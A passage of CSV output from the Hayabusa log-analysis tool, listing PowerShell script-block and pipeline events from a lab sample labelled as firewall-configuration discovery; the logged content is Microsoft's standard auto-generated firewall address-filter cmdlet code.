-and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if 
($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallAddressFilter ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallAddressFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.832 
+09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallAddressFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetAddressFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 
'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallAddressFilter' function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query 
(cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true 
throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallAddressFilter'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.832 
+09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, 